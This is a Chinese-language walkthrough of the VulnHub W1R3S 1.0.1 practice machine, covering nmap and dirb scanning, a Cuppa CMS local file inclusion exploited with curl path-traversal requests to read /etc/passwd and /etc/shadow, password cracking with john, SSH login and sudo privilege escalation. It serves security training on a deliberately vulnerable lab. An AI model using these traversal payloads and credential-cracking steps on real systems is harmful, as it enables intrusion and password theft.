Vulhub W1R3S: 1.0.1靶机详解

项目地址

plain 复制代码
https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip

实验过程

开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

plain 复制代码
nmap 192.168.47.1-254

根据对比可知W1R3S: 1.0.1的一个ip地址为192.168.47.172

扫描W1R3S: 1.0.1的操作系统,端口及对应服务

plain 复制代码
nmap -A -p- 192.168.47.172

发现该靶机开放了21,22,80,3306端口

目录扫描

plain 复制代码
dirb http://192.168.47.172

获取shell

访问网站

拼接访问目录扫描出的目录/administrator

这是一个数据库的安装创建,但不知道密码和数据库名

观察网页标题为Cuppa CMS

搜索一下它的历史漏洞

plain 复制代码
searchsploit cuppa
plain 复制代码
searchsploit -m php/webapps/25971.txt

文件中描述说,/alerts/alertConfigField.php文件urlConfig 参数存在 LFI 漏洞,可以利用特殊的 url ,查看本地文件

在网页上面进行尝试访问,发现没有回显结果

用curl 尝试看可不可以下载下来

plain 复制代码
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.47.172/administrator/alerts/alertConfigField.php

在文件中发现了 w1r3s 用户,用同样的方法获得存密码的shadow文件试试,发现了 rootwww-dataw1r3s用户的密码

plain 复制代码
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.47.172/administrator/alerts/alertConfigField.php

将密码存到一个文件中进行爆破

plain 复制代码
vim password.txt
cat password.txt
plain 复制代码
john password.txt

使用ssh进行远程连接,发现w1r3s用户连接成功

plain 复制代码
ssh w1r3s@192.168.47.172

提权

查看可执行的命令

plain 复制代码
sudo -l

发现是ALL

直接sudo su提权

提权成功

相关推荐
哥是强混2 小时前
Means:基于 .NET 10 打造的开源自部署 S3 兼容对象存储服务
网络·数据库·.net
Piko6143 小时前
锐捷 VSU 虚拟化堆叠配置
运维·网络·笔记
2301_780303903 小时前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
学逆向的4 小时前
汇编——内存
开发语言·汇编·算法·网络安全
爱研究的小梁4 小时前
乾元通多链路聚合通信主流落地应用案例
网络·信息与通信
Bobolink_4 小时前
跨境网络丢包优化实践,从5%到0.2%的排查与调整过程
网络·跨境网络·丢包优化
Piko6144 小时前
锐捷交换机 DHCP Server部署
运维·网络·笔记
多巴胺梦想家5 小时前
数据库恢复技术:当灾难来临
网络·数据库·oracle
一口一口吃成大V6 小时前
lattice mipi ip开启DESKEW_EN属性(“ENABLED“),输出异常
网络·网络协议·tcp/ip
天天进步20157 小时前
Python全栈项目--基于Python的网络监控工具
开发语言·网络·python